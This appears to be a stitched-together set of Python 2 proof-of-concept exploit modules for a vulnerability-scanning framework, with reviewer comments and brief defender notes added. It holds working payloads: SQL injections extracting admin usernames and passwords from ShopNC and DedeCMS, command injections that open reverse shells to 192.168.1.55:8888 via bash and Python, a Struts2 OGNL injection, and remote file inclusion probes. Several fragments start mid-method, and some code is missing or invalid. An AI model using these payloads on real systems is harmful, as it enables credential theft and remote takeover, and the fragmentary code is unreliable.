        url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
        payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
        values = list()
        values.append("form_submit=ok&id=&true_name[]=")
        values.append(payload)
        values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
        post_data = "".join(values)
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200:
            match_result = re.findall(r'~\w*', res.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                # NOTE(review): match_result[1] raises IndexError when only
                # one '~' value is found. The stored values are credential
                # material, so the resulting report needs to be handled as
                # sensitive data.
                result['AdminInfo']['Username'] = match_result[0][1:]
                result['AdminInfo']['Password'] = match_result[1][1:]
        return self.parse_attack(result)

    @require_header('cookie')
    def _verify(self):
        '''Interactive check against the profile and admin-settings pages.

        NOTE(review): part of this method was lost in the listing (see the
        getpass line), so its full flow cannot be described from here.
        '''
        result = {}
        # Define the URLs.
        vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
        logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
        login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
        admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
        # Payload intended to raise the account to administrator.
        payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        email = raw_input("Email: ")
        # NOTE(review): the text between 'password:' and '<a href=...' was
        # replaced by asterisks in the listing; the statements that defined
        # admin_result and find_result are missing, so this line is not valid
        # Python as shown.
        password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
        # NOTE(review): nesting below is reconstructed from a collapsed line -- confirm.
        if find_result != -1:
            # Take the cookies.
            cookies = admin_result.cookies
            # Send the POST request.
            get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)
            # NOTE(review): Python 2 debug prints; they write session cookies
            # and page content to stdout.
            print cookies
            print get_shell_result.content
            print get_shell_result.cookies
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Postdata'] = payload
        return self.parse_attack(result)

    # NOTE(review): do_login has no body in the listing; it was either lost in
    # extraction or never written.
    def do_login(self):

    def parse_attack(self, result):
        '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(EduwindPOC)
# NOTE(review): this excerpt starts inside a method body (apparently _verify,
# since _attack below calls it); the enclosing def and the definition of
# _cookies are not visible.
payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'}
response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# Method 2: new bash code
# payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# Method 3: Python shell; this one seems to work only when run by hand
# payload = {
# 'ip' : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&',
# 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# NOTE(review): `response` is never inspected and the result is filled in
# unconditionally, so success is reported whatever the server answered.
# The callback address 192.168.1.55:8888 is hard-coded.
# Defender's view: a shell metacharacter (";") after the address in the `ip`
# form field is the indicator; validating the field as an IP address and not
# passing it to a shell removes the injection point.
result['extra'] = {}
result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
return self.parse_output(result)

def _attack( self ):
    '''Attack mode: delegates to _verify(), so both modes send the same request.'''
    return self._verify()

def parse_output( self, result ):
    '''Wrap result in an Output: success() when non-empty, fail('Error') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Error')
    return output

# Module level: hands the PoC class to register().
register(TestPoc)
Content-Length: 171 Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36; Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 --1c88e9afa73c438d93b5043a7096b207 Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b" Content-Type: text/plain --1c88e9afa73c438d93b5043a7096b207-- """.format(uri=uri, randint1=str(randint1))
# NOTE(review): the line above is the tail of a triple-quoted raw HTTP request
# inside a function whose start is outside this excerpt; the line breaks of
# the request were lost when the listing was collapsed, so it is kept as is.
# The multipart filename asks the server to add a response header named
# X-Test-<randint1>; that header is the success criterion below.
# Defender's view: a multipart filename containing "%{" is the indicator to
# log or reject.
code, head, html, redir, log = curl.http(arg, raw=raw)
# print head
if code != 0 and "X-Test-%s" % str(randint1) in head:
    return True
else:
    return False

def parse_output(self, result):
    '''Wrap result in an Output: success() when truthy, fail('Failed') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Failed')
    return output

# Module level: hands the PoC class to register().
register(Struts46POC)
# NOTE(review): this excerpt starts inside a method body; the enclosing def
# and the code that produces `data` are not visible.
if data != None:
    result = {'VerifyInfo': {}}
    result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)

def _attack(self):
    '''Request plus/recommend.php with crafted _FILES[...] parameters and parse the <h2> element.

    When the pattern matches, the captured group is stored under
    VerifyInfo.data together with the target URL.
    '''
    result = {}
    target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
    response = req.get(target)
    content = response.content
    # Captures the text after the last '|' that precedes </h2>.
    regex = re.compile('<h2>.*?\|(.*?)</h2>')
    data = regex.search(content)
    if data != None:
        string = data.groups()
        result = {'VerifyInfo': {}}
        result['VerifyInfo']['URL'] = self.url
        # NOTE(review): the query selects userid and pwd columns, so whatever
        # is captured here is credential material; the resulting report needs
        # to be handled as sensitive data.
        result['VerifyInfo']['data'] = string
    return self.parse_result(result)

def parse_result(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail("Internet Nothing returned")
    return output

# Module level: hands the PoC class to register().
register(Fuckdede)
All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk. '''
# NOTE(review): the line above is the tail of a triple-quoted string whose
# start (and the class header) are outside this excerpt.
samples = ['']

def _attack(self):
    '''Attack mode: delegates to _verify().'''
    return self._verify()

def _verify(self, verify=True):
    '''Request /api/wlan/security-settings without credentials and check the reply.

    The URL is reported when the body contains both a <WifiWpapsk> and a
    <WifiWpaencryptionmodes> element. The `verify` parameter is not used in
    the body.
    '''
    result = {}
    vul_url = '%s/api/wlan/security-settings' % (self.url)
    response = req.get(vul_url).content
    if re.search('<WifiWpapsk>', response) and re.search('<WifiWpaencryptionmodes>', response):
        # Only the URL is recorded; the response content is not copied into
        # the result.
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
    # Defender's view: a finding means the device returns its WLAN security
    # settings to an unauthenticated request; restrict access to the
    # management interface and rotate the Wi-Fi key after exposure.
    return self.parse_attack(result)

def parse_attack(self, result):
    '''Wrap result in an Output: success() when non-empty, fail('failed') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('failed')
    return output

# Module level: hands the PoC class to register().
register(Huawei_E5331_Unauthorized_access)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check cropimagedir on admin.cropcanvas.php for remote file inclusion.

    Reports the target when the response to a request carrying an external
    URL in that parameter contains the marker string.
    '''
    target = '%s/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: PHP's allow_url_include=Off stops include() from
    # fetching URLs; the probe itself is visible as "=http://" in the query.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(Mambo_cropimage_Component_Remote_File_Include)
# NOTE(review): methods of a class whose header is outside this excerpt.
def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check DOCUMENT_ROOT on /includes/tgpinc.php for remote file inclusion.

    The request sets the parameter to an external URL; the target is
    reported when the marker string occurs in the response body.
    '''
    probe = '%s/includes/tgpinc.php?DOCUMENT_ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    body = req.get(probe).content
    findings = {}
    # The marker is matched verbatim; presumably it is what the external file
    # yields once the target includes it -- TODO confirm.
    if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # NOTE(review): no timeout is passed to req.get(), and a miss can also
    # mean the external host was unreachable, not that the parameter is safe.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(GnatTGP_Remote_File_Include)
# NOTE(review): this excerpt starts inside a method body (apparently _verify,
# since _attack below calls it); the enclosing def is not visible.
result = {}
target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
response = req.get(target)
content = response.content
# NOTE(review): the success criterion is the application's generic error
# banner, so any request that triggers that banner counts as a finding;
# expect false positives.
if 'DedeCMS Error Warning!' in content:
    result = {'VerifyInfo':{}}
    result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)

def _attack(self):
    '''Attack mode: delegates to _verify().'''
    return self._verify()

def parse_result(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail("Internet Nothing returned")
    return output

# Module level: hands the PoC class to register().
register(Fuckdede)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check REP_INC on /genpage-cgi.php for remote file inclusion.

    Reports the target when the response to a request carrying an external
    URL in that parameter contains the marker string.
    '''
    target = '%s/genpage-cgi.php?REP_INC=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: the probe is visible in access logs as a REP_INC value
    # that starts with http://.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(Hitweb_Remote_File_Include)
parttern = '\$~~~\$(.*)\*\*\*(.*)\$~~~\$' #发送请求 resp = req.get(url=vulurl, headers=httphead, timeout=80) #检查是否含有特征字符串 if '$~~~$' in resp.content: #提取信息 match = re.search(parttern, resp.content, re.M | re.I) if match: #漏洞利用成功 result['DbInfo'] = {} #数据库用户名 result['DbInfo']['Username'] = match.group(1) #数据库版本 result['DbInfo']['Version'] = match.group(2) return self.parse_output(result) def _verify(self): return self._attack() def parse_output(self, result): #parse output output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(TestPOC)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check the file_path parameter of /index.php for remote file inclusion.

    Reports the target when the response to a request carrying an external
    URL in that parameter contains the marker string.
    '''
    target = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: PHP's allow_url_include=Off stops include() from
    # fetching URLs; the probe itself is visible as "=http://" in the query.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(FlatNuke_Remote_File_Include)